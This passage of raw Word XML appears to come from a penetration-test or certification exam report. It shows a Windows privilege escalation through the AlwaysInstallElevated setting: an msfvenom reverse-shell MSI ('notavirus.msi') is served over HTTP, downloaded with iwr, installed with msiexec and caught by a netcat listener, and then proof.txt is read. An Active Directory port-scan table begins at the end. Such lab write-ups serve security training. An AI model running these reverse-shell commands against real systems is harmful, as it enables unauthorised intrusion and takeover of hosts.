                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    REG_DWORD    0x1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6E711C96" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="04629278"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5469F49C" wp14:editId="7FD9D61E">
                        <wp:extent cx="5613400" cy="1487805"/>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5613400" cy="1487805"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5499AF54" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>We’ll generate .</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>msi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> payload and transfer it to execute on target machine to get elevated shell.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="26E80A06"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lastRenderedPageBreak/>
                    <w:t xml:space="preserve">└─$ </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>msfvenom</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -p windows/x64/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell_reverse_tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> LHOST=192.168.45.154 LPORT=445 -f </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>msi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &gt; notavirus.msi</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2ED56039"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62F827BF" wp14:editId="6519A51F">
                        <wp:extent cx="5613400" cy="732790"/>
                        <wp:effectExtent l="0" t="0" r="0" b="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6"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="732790"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4AD92E97"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python -m </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>http.server</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 80</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="08DD466D"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23E09531" wp14:editId="79C84719">
                        <wp:extent cx="5613400" cy="536575"/>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7"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="536575"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2BE388D5"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iwr</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> http://192.168.45.154/notavirus.msi -o notavirus.msi</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="530526EC" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:noProof/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135C832B" wp14:editId="5F20D07A">
                        <wp:extent cx="5613400" cy="342265"/>
                        <wp:effectExtent l="0" t="0" r="0" b="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8"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="342265"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="07B319E2"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PS C:\Users\shenzi\Desktop&gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>msiexec</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>i</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> notavirus.msi</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7CF4A706" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="08EAB995" wp14:editId="2FDE33C4">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>165100</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5613400" cy="750570"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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9"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="750570"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="50B88CA9"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 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>nc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>lvnp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 445</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="04700DA1" w14:textId="235506B3" w:rsidR="00CB67CB" w:rsidRPr="00177B5C" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7A74A73D" wp14:editId="6840C279">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>165100</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5613400" cy="1478915"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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5613400" cy="1478915"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5510B934" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="2F20854B" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="402291A3" w14:textId="77777777" w:rsidR="00E20BC9" w:rsidRDefault="00E20BC9">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="59C79115" w14:textId="0DA64E9D" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t xml:space="preserve">4.1.4 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Post Exploitation</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5815CA4A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Proof.txt value:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="56FE55CB" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                      <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                      <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                      <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
                    </w:pBdr>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">c:\Users\Administrator\Desktop&gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>whoami</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &amp;&amp; ipconfig &amp;&amp; type proof.txt</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="762E2F93" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="17718AC7" wp14:editId="79E5C091">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>165100</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5613400" cy="2216785"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="2216785"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="355" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="64E40AA5" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00CB67CB" w14:paraId="3087703C" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="11234"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9355" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                    <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                </w:tcPr>
                <w:p w14:paraId="14A6849B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading1"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="15" w:name="_1ksv4uv" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="15"/>
                  <w:r>
                    <w:lastRenderedPageBreak/>
                    <w:t>5. Active Directory Set</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5339F138" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Port Scan Results</w:t>
                  </w:r>
                </w:p>
                <w:tbl>
                  <w:tblPr>
                    <w:tblStyle w:val="a2"/>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15"/>
                    <w:gridCol w:w="6835"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="5AC7365F" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2515" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="70E7D30C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>IP Address</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="6835" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="08986E2C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>Ports Open</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00CB67CB" w14:paraId="5B5954E5" w14:textId="77777777">
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="2515" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
                      </w:tcPr>
                      <w:p w14:paraId="277DB0AE" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:line="360" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
